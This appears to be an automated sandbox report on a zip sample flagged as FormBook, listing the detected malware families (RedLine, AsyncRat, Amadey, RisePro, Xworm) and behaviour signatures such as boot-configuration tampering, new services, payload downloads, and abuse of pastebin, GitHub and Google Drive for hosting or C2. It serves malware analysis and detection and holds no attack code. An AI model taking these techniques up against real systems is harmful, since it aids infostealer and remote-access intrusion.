Malware Analysis Report

2024-07-11 10:04

Sample ID 240601-v1b7saad53
Target Trojan;MSIL.FormBook.AFO!MTB.zip
SHA256 69811fd3a031d56a72428c7f3f74573b551c2dc9b5fb827fe6740a03eae55f31
Tags
amadey asyncrat redline risepro xworm 0e6740 1 49e482 @logscloudyt_bot fresh evasion execution infostealer persistence ransomware rat stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

69811fd3a031d56a72428c7f3f74573b551c2dc9b5fb827fe6740a03eae55f31

Threat Level: Known bad

The file Trojan;MSIL.FormBook.AFO!MTB.zip was found to be: Known bad.

Malicious Activity Summary

amadey asyncrat redline risepro xworm 0e6740 1 49e482 @logscloudyt_bot fresh evasion execution infostealer persistence ransomware rat stealer trojan upx

Xworm

RedLine payload

RedLine

AsyncRat

RisePro

Amadey

Detect Xworm Payload

Modifies boot configuration data using bcdedit

Creates new service(s)

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Stops running service(s)

UPX packed file

.NET Reactor proctector

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

AutoIT Executable

Launches sc.exe

Unsigned PE

Program crash

Enumerates processes with tasklist

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

GoLang User-Agent

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies data under HKEY_USERS

Creates scheduled task(s)

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-01 17:26

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-01 17:26

Reported

2024-06-01 17:44

Platform

win11-20240508-en

Max time kernel

451s

Max time network

461s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.zip

Network

Country Destination Domain Proto
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 17:26

Reported

2024-06-01 17:43

Platform

win10-20240404-en

Max time kernel

995s

Max time network

998s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.zip

Signatures

Amadey

trojan amadey

AsyncRat

rat asyncrat

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RisePro

stealer risepro

Xworm

trojan rat xworm

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Creates new service(s)

persistence execution

Downloads MZ/PE file

Stops running service(s)

evasion execution

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A pastebin.com N/A N/A
N/A drive.google.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A drive.google.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A drive.google.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.com N/A N/A
N/A drive.google.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A drive.google.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.ipify.org N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133617364697361372" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1226833921" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\SniffedFolderType = "Generic" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe11000000f1577fe98986da0141bcfb7249b4da0141bcfb7249b4da0114000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "10" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000f8f57ce98986da01980127fc8d86da01980127fc8d86da0114000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "11" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
